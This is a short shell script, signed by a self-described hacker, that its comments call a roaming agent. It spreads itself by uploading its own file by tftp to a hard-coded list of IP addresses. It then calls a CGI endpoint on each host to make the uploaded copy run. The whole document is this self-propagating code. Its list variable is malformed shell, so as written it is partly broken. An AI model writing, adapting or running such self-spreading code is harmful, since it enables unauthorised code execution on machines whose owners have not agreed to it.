#!/bin/sh
# 
# A SMALL LINUX /bin/sh HTTP ROAMING AGENT SCRIPT.
#
# MAYBE THIS SCRIPT CAN BE OVER WRITTEN OVER AND OVER AGAIN
#
# HACKER: SKUMMY
# DATE: 12/3/2009
#
#

export AGENT_NAME="simple_agent.sh"
export ME=`hostname`
export YOU=""
export LIST="192.168.1.2" "192.168.1.6"

for YOU in ${LIST};
do

   tftp ${YOU} put ${AGENT_NAME}

   wget "http://${YOU}/cgi-bin/run_agent.cgi?agent=${AGENT_NAME}" > ./simple_agent.txt

done


